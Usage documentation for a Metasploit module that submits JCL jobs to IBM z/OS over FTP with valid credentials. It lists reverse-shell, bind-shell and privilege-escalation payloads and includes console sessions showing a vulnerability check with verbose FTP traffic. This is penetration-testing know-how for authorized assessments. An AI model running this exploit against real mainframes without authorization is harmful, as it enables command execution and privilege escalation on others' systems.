z/OS JCL authorized FTP-base command execution - hints & tips
In order to use this exploit, you must have valid credentials on the target z/OS system. The credentials must have access to upload files via FTP. If in doubt, use the check function of the exploit.
This exploit was tested on the ftp daemons for z/OS version 1.13 / 2.1
If the exploit works, any JCL the user has rights to submit can be submitted.
See cmd type payloads under mainframe with jcl in the payload name, e.g.:
msf exploit(ftp_jcl_creds) > show payloads
Compatible Payloads
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/mainframe/apf_privesc_jcl normal JCL to escalate privileges via APF LIB
cmd/mainframe/bind_shell_jcl normal Z/OS (MVS) Command Shell, Bind TCP
cmd/mainframe/generic_jcl normal Generic JCL Test for Mainframe Exploits
cmd/mainframe/reverse_shell_jcl normal Z/OS (MVS) Command Shell, Reverse TCP
A successful check of the exploit will look like this:
msf exploit(ftp_jcl_creds) > set FTPUSER ftptest
FTPUSER => ftptest
msf exploit(ftp_jcl_creds) > set FTPPASS password
FTPPASS => password
msf exploit(ftp_jcl_creds) > set RHOST
msf exploit(ftp_jcl_creds) > info
Name: FTP JCL Execution
Module: exploit/mainframe/ftp/ftp_jcl_creds
Platform: Mainframe
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2013-05-12
Available targets:
Id Name
-- ----
0 auto
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS password no The password for the specified username
FTPUSER ftptest no The username to authenticate as
RHOST yes The target address
RPORT 21 yes The target port
SLEEP 5 no Time to wait before checking if job has completed.
Payload information:
Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires
valid credentials on the target system
msf exploit(ftp_jcl_creds) > check
[+] - Successfully connected to FTP server.
[*] - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
If the exploit or check is not working, turn on the VERBOSE and FTPDEBUG settings of the exploit and run. The output should look similar to the below, on a vulnerable system.
msf exploit(ftp_jcl_creds) > set FTPDEBUG true
FTPDEBUG => true
msf exploit(ftp_jcl_creds) > set VERBOSE true
VERBOSE => true
msf exploit(ftp_jcl_creds) > check
[*] - Connecting to FTP server
[*] - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n"
[*] - Connected to target FTP server.
[*] - Authenticating as ftptest with password password...
[*] - FTP send: "USER ftptest\r\n"
[*] - FTP recv: "331 Send password please.\r\n"
[*] - Sending password...
[*] - FTP send: "PASS password\r\n"
[*] - FTP recv: "230 FTPTEST is logged on. Working directory is \"FTPTEST.\".\r\n"
[+] - Successfully connected to FTP server.
[*] - FTP send: "site file=jes\r\n"
[*] - FTP recv: "200 SITE command was accepted\r\n"
[*] - Found IBM z/OS Banner and JES commands accepted
[+] The target is vulnerable.
msf exploit(ftp_jcl_creds) >
The job run will leave a joblog for the credentials used.